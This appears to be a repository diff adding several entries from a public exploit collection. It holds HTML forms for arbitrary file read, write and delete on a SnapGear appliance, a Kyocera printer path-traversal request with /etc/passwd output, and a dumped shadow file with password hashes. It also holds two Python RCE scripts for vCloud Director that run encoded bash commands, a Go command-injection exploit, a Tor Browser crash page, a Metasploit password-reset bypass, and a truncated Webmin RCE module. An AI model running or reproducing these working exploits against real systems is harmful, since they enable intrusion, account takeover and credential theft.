<input type="hidden" name="password" value="123456" />
<input type="hidden" name="confirm" value="123456" />
<input type="hidden" name="acl.login" value="on" />
<input type="hidden" name="acl.admin" value="on" />
<input type="hidden" name="acl.diags" value="on" />
<input type="hidden" name="acl.saverestore" value="on" />
<input type="hidden" name="acl.setpassword" value="on" />
<input type="hidden" name="finish" value="Finish" />
<input type="hidden" name=".defaultname" value="finish" />
<input type="submit" value="Idemo" />
</form>
</body>
</html>
Result /etc/shadow:
root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh
sshd:!!:100:65534::/home:/bin/false
clamav:!!:103:65534::/home:/bin/false
testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh

+ 95
- 0
exploits/hardware/webapps/48556.txt View File

@ -0,0 +1,95 @@
# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: http://www.securecomputing.com
# CVE: N/A
Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write
Vendor: Secure Computing Corp.
Product web page: http://www.securecomputing.com
Affected version: 3.1.5u1
Summary: The SG gateway appliance range provides Internet security and
privacy of communications for small and medium enterprises, and branch
offices. It simply and securely connects your office to the Internet,
and with its robust stateful firewall, shields your computers from
external threats.
Desc: The application allows the currently logged-in user to edit the
configuration files in the system using the CGI executable 'edit_config_files'
in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete)
are located in the /etc/config/ directory. An attacker can manipulate
the POST request parameters to escape from the restricted environment
by using absolute path and start reading, writing and deleting arbitrary
files on the system.
Tested on: fnord/1.9
Apache 1.3.27 (Unix)
Linux 2.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5568
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php
14.05.2020
--
Read:
-----
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="choices" />
<input type="hidden" name=".page" value="select_file" />
<input type="hidden" name="name$1337" value="/var/log/messages" />
<input type="hidden" name="modify$1337" value="1" />
<input type="hidden" name=".defaultname" value="newitem" />
<input type="submit" value="Read" />
</form>
</body>
</html>
Write/overwrite/move:
---------------------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="edit" />
<input type="hidden" name=".page" value="edit_file" />
<input type="hidden" name="enabled$0" value="" />
<input type="hidden" name="name$0" value="/etc/motd" />
<input type="hidden" name="mode$0" value="" />
<input type="hidden" name="filename" value="/etc/motd" />
<input type="hidden" name="filecontents" value="pwned" />
<input type="hidden" name="finish" value="Finish" />
<input type="hidden" name=".defaultname" value="finish" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete:
-------
<html>
<body>
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
<input type="hidden" name=".form" value="choices" />
<input type="hidden" name=".page" value="select_file" />
<input type="hidden" name="name$251" value="/root/.secret" />
<input type="hidden" name="delete$251" value="1" />
<input type="hidden" name=".defaultname" value="newitem" />
<input type="submit" value="Delete" />
</form>
</body>
</html>

+ 68
- 0
exploits/hardware/webapps/48561.txt View File

@ -0,0 +1,68 @@
# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)
# Exploit Author: Hakan Eren ŞAN
# Date: 2020-06-06
# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html
# Version: d-COPIA253MF plus
# Tested on : Linux
# Credit: Berat Isler
# First step , you can capture the main page
# Then create a directory traveral payload like ../../../ this
# Then you add nullbyte to the end of the payload(%00)
# Last step sent your request
This is the code :
Request:
GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
Gecko/20100101 Firefox/76.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: rtl=0
Upgrade-Insecure-Requests: 1
If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT"
Cache-Control: max-age=0
Response:
HTTP/1.1 200 OK
Content-Length: 843
Date: Thu, 04 Jun 2020 16:09:54 GMT
Server: KM-MFP-http/V0.0.1
Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT
ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun
2020 13:41:16 GMT"
Content-Type: text/html
root::0:0:root:/root:/bin/sh
bin:*:1:1:bin:/bin:/bin/sh
daemon:*:2:2:daemon:/usr/sbin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
adm:*:4:4:adm:/var/adm:/bin/sh
lp:*:5:7:lp:/var/spool/lpd:/bin/sh
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/mail:/bin/sh
news:*:10:12:news:/var/spool/news:/bin/sh
uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh
operator:*:12:0:operator:/root:/bin/sh
games:*:13:60:games:/usr/games:/bin/sh
ftp:*:15:14:ftp:/var/ftp:/bin/sh
man:*:16:20:man:/var/cache/man:/bin/sh
www:*:17:18:www-data:/var/www:/bin/sh
sshd:*:18:19:sshd:/var/run/sshd:/bin/sh
proxy:*:19:21:proxy:/bin:/bin/sh
telnetd:*:20:22:proxy:/bin:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
ais:*:101:101:ais:/var/run/ais:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh

+ 3670
- 0
exploits/hardware/webapps/48588.py
File diff suppressed because it is too large
View File


+ 18
- 0
exploits/ios/local/47409.txt View File

@ -0,0 +1,18 @@
Exploit Title: SockPuppet 3
Date: September 8, 2019
Exploit Author: Umang Raghuvanshi
Vendor Homepage: https://apple.com
Software Link: https://ipsw.me/
Version: iOS 11.0—12.2, iOS 12.4
Tested on: iOS 11.0—12.2, iOS 12.4
CVE: CVE-2019-8605
This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required.
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47409.zip
[1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720
[2] https://twitter.com/Pwn20wnd/status/1163392040073191426
[3] https://twitter.com/electra_team/status/1163658714840047618

+ 138
- 0
exploits/java/webapps/48549.py View File

@ -0,0 +1,138 @@
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
#!/usr/bin/python
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urllib.parse import urlparse
else:
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
session = requests.Session()
def login(url, username, password, verbose):
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
res = session.get(target_url)
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
if match:
tenant = match.group(1)
else:
print('[!] can\'t find tenant identifier')
return
if verbose:
print('[*] tenant: %s'%(tenant))
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
if match: # Cloud Director 9.*
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
res = session.post(login_url, data={'username':username,'password':password})
if res.status_code == 401:
print('[!] invalid credentials')
return
else: # Cloud Director 10.*
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
if match:
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
headers = {
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
'Accept': 'application/json;version=29.0',
'Content-type': 'application/json;version=29.0'
}
res = session.post(login_url, headers=headers)
if res.status_code == 401:
print('[!] invalid credentials')
return
else:
print('[!] url for login form was not found')
return
cookies = session.cookies.get_dict()
jwt = cookies['vcloud_jwt']
session_id = cookies['vcloud_session_id']
if verbose:
print('[*] jwt token: %s'%(jwt))
print('[*] session_id: %s'%(session_id))
res = session.get(target_url)
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
if match is None:
print('[!] organization not found')
return
organization = match.group(1)
if verbose:
print('[*] organization name: %s'%(organization))
match = re.search(r'orgId : \'([^\']+)', res.content)
if match is None:
print('[!] orgId not found')
return
org_id = match.group(1)
if verbose:
print('[*] organization identifier: %s'%(org_id))
return (jwt,session_id,organization,org_id)
def exploit(url, username, password, command, verbose):
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
headers = {
'Accept': 'application/*+xml;version=29.0',
'Authorization': 'Bearer %s'%jwt,
'x-vcloud-authorization': session_id
}
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
res = session.get(admin_url, headers=headers)
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
if match:
version = match.group(1)
if verbose:
print('[*] detected version of Cloud Director: %s'%(version))
else:
version = None
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
res = session.put(email_settings_url, data=data, headers=headers)
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
if verbose:
print('')
try:
print(base64.b64decode(match.group(1)))
except Exception:
print(res.content)
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)

+ 71
- 0
exploits/jsp/webapps/47391.go View File

@ -0,0 +1,71 @@
/********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
*********************************************************************************/
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
var (
target string
port string
cmd string
)
func main() {
for i := range os.Args {
if os.Args[i] == "-u" {
target = os.Args[i+1]
} else if os.Args[i] == "-p" {
port = os.Args[i+1]
} else if os.Args[i] == "-cmd" {
cmd = os.Args[i+1]
}
}
if target != "" || port != "" || cmd != "" {
cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost"
status, body := exploit()
if strings.Contains(status, "200") {
fmt.Println("Status Code: " + status)
result := strings.Split(body, "0xdeadnoob")
fmt.Println("Result: \n" + strings.Trim(result[1], "\n"))
return
}
fmt.Println("Exploit failed!")
} else {
fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
}
}
func exploit() (string, string) {
tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tbTransport}
datas, err := url.ParseQuery(cmd)
req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode()))
req.Header.Set("Content-type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
return resp.Status, string(body)
}

+ 30
- 0
exploits/linux/dos/44994.html View File

@ -0,0 +1,30 @@
# Exploit Title: Tor Browser - Use After Free (PoC)
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.torproject.org/
# Software Link: https://www.torproject.org/download/download-easy.html.en
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491
#Run exploit, result DOS
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

+ 131
- 0
exploits/linux/remote/48196.txt View File

@ -0,0 +1,131 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' ,
'Description' => %q{
This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
In order to exploit this vulnerability, the username must be known.
Exploiting this vulnerability create a new password for the user you specified and present it to you.
The "verification code" and "cookie generate" functions required to reset the password contain vulnerability.
When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset.
But this verification code written in the database is also reflected in the response of the request.
The first vector would be to use this verification code.
The second vector is the "rand" cookie values returned in this request. These values are md5.
If these values are assigned in the response, password reset can be done via these cookie values.
Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
[ 'URL', 'https://www.globalservices.bt.com' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "March 2 2020",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username']),
OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
])
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def check
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
})
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? '"rand"'
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def run
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
if res.code == 200 and res.body.include? '"mobileMask"'
print_good("Excellent! password resettable for #{datastore["USERNAME"]}")
else
fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
end
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
@cookie = res.get_cookies
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getresult.jsp'),
'cookie' => @cookie,
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}"
})
if res.body.include? 'result":10'
print_good("boom! Password successfully reseted.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
else
fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}")
end
end
end
end

+ 139
- 0
exploits/linux/remote/48540.py View File

@ -0,0 +1,139 @@
#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urllib.parse import urlparse
else:
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
session = requests.Session()
def login(url, username, password, verbose):
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
res = session.get(target_url)
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
if match:
tenant = match.group(1)
else:
print('[!] can\'t find tenant identifier')
return (None,None,None,None)
if verbose:
print('[*] tenant: %s'%(tenant))
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
if match: # Cloud Director 9.*
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
res = session.post(login_url, data={'username':username,'password':password})
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else: # Cloud Director 10.*
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
if match:
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
headers = {
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
'Accept': 'application/json;version=29.0',
'Content-type': 'application/json;version=29.0'
}
res = session.post(login_url, headers=headers)
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else:
print('[!] url for login form was not found')
return (None,None,None,None)
cookies = session.cookies.get_dict()
jwt = cookies['vcloud_jwt']
session_id = cookies['vcloud_session_id']
if verbose:
print('[*] jwt token: %s'%(jwt))
print('[*] session_id: %s'%(session_id))
res = session.get(target_url)
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
if match is None:
print('[!] organization not found')
return (None,None,None,None)
organization = match.group(1)
if verbose:
print('[*] organization name: %s'%(organization))
match = re.search(r'orgId : \'([^\']+)', res.content)
if match is None:
print('[!] orgId not found')
return (None,None,None,None)
org_id = match.group(1)
if verbose:
print('[*] organization identifier: %s'%(org_id))
return (jwt,session_id,organization,org_id)
def exploit(url, username, password, command, verbose):
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
if jwt is None:
return
headers = {
'Accept': 'application/*+xml;version=29.0',
'Authorization': 'Bearer %s'%jwt,
'x-vcloud-authorization': session_id
}
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
res = session.get(admin_url, headers=headers)
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
if match:
version = match.group(1)
if verbose:
print('[*] detected version of Cloud Director: %s'%(version))
else:
version = None
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
res = session.put(email_settings_url, data=data, headers=headers)
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
if verbose:
print('')
try:
print(base64.b64decode(match.group(1)))
except Exception:
print(res.content)
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)

+ 170
- 0
exploits/linux/webapps/47330.rb View File

@ -0,0 +1,170 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Webmin < 1.930 Remote Code Execution",
'Description' => %q{
This exploit takes advantage of a code execution issue within the function
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
The only prerequisite is a valid session id.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay', # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'https://www.gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2019/08/30',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WMPORT', [ true, "Webmin port", '10000']),
OptString.new('WMUSER', [ true, "Webmin username", 'test']),
OptString.new('WMPASS', [ true, "Webmin password", 'test']),
])
end
def check
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return Exploit::CheckCode::Safe
end
else
# No dice
print_bad("Unexpected response")
return Exploit::CheckCode::Safe
end
# Verbose
print_status("Checking if host is vulnerable")
# Try to execute arbitrary code